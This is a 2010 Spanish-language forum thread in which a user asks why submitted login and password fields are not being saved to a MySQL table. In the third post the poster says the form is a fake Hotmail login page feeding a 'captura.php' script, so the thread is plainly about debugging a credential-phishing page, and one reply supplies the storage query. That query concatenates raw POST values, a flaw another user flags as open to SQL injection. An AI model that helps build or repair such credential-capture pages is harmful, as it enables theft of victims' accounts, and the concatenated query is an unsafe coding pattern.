Foros del Web » Programación para mayores de 30 ;) » Bases de Datos General »

No Guarda Datos en DB

Estas en el tema de No Guarda Datos en DB en el foro de Bases de Datos General en Foros del Web. Hola ,no se si alguien puede ayudarme a resolver el problemita ke tengo. Lo que estoy haciendo es un lanzador con base de datos,el proceso ...
  #1 (permalink)  
Antiguo 25/04/2010, 10:33
 
Fecha de Ingreso: abril-2010
Mensajes: 22
Antigüedad: 14 años
Puntos: 0
No Guarda Datos en DB

Hola ,no se si alguien puede ayudarme a resolver el problemita ke tengo.

Lo que estoy haciendo es un lanzador con base de datos,el proceso va bien ,solo que el problema surge al guardar los datos en la DB .



la tabla que e creado es :

create table cuentas (
`id` INT NOT NULL AUTO_INCREMENT PRIMARY KEY ,
login VARCHAR(50),
passwd VARCHAR(32)
);


Los ID se incrementa cada vez que pruebo ,pero los datos del login passwd no se guardan .

e intentado con INSERT INTO TABLE cuentas o INSERT INTO TABLE 'cuentas' ,pero esto ni siquiera incrementa los ID y tampoco aparecen los datos .

No se alguien podria darme una manito con este problema ,gracias

Última edición por nickeado; 13/05/2010 a las 18:05 Razón: solucionado
  #2 (permalink)  
Antiguo 25/04/2010, 20:23
Avatar de spider_boy  
Fecha de Ingreso: diciembre-2003
Ubicación: Chile
Mensajes: 1.855
Antigüedad: 20 años, 4 meses
Puntos: 89
Respuesta: No Guarda Datos en DB

Ese código se ejecuta cada vez que cargas la página. El código está bien, pero está mal implementado. ¿De dónde sale $login y $passwd? No veo que lleguen de ninguna parte.
__________________
Nunca te olvidaré mi negra hermosa. Te extraño demasiado.
  #3 (permalink)  
Antiguo 27/04/2010, 20:53
 
Fecha de Ingreso: abril-2010
Mensajes: 22
Antigüedad: 14 años
Puntos: 0
Respuesta: No Guarda Datos en DB

Provienen de un arcchivo llamado login.php

y contiene la pagina falsa de hotmail ,y en el los input con nombre de login y passwd ..

Cita:
<input type="submit" name="login" id="idSubmit_PWD_SignIn1Pwd" style="height: 22px;"></td>
<INPUT id=password type=password maxLength=20 size=20
name=passwd>
Es una parte del codigo login.php y este te envie a captura.php

claro que tambien hay otro ke hace la conexion a la base de datos : config.php

Solo el codigo captura.php es el ke me hace problemas ,no se porke .
  #4 (permalink)  
Antiguo 27/04/2010, 21:03
 
Fecha de Ingreso: abril-2010
Mensajes: 111
Antigüedad: 14 años
Puntos: 3
Respuesta: No Guarda Datos en DB

haslo asi men...
("INSERT INTO cuentas (login,passwd) values ('".$_POST[l"ogin"]."','".$_POST["passwd"]."')");
creo que asi te funcionara..
recuerda 2comillas cimples luego 2comillas doble y lueigo 2puntos....
  #5 (permalink)  
Antiguo 28/04/2010, 23:02
 
Fecha de Ingreso: mayo-2005
Mensajes: 284
Antigüedad: 18 años, 10 meses
Puntos: 11
Respuesta: No Guarda Datos en DB

ni se te ocurra hacerlo asi porque permitis ataques de "SQL Injection" (inyección SQL), tenes que asegurarte que los datos introducidos por el usuario sean seguros antes de meterlos a una consulta SQL
  #6 (permalink)  
Antiguo 13/05/2010, 18:08
 
Fecha de Ingreso: abril-2010
Mensajes: 22
Antigüedad: 14 años
Puntos: 0
Respuesta: No Guarda Datos en DB

Bueno ,gracias por su respuesta ,al fin lo solucione cambiandome de host a uno gratuito..

Etiquetas: guardar
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 10:03.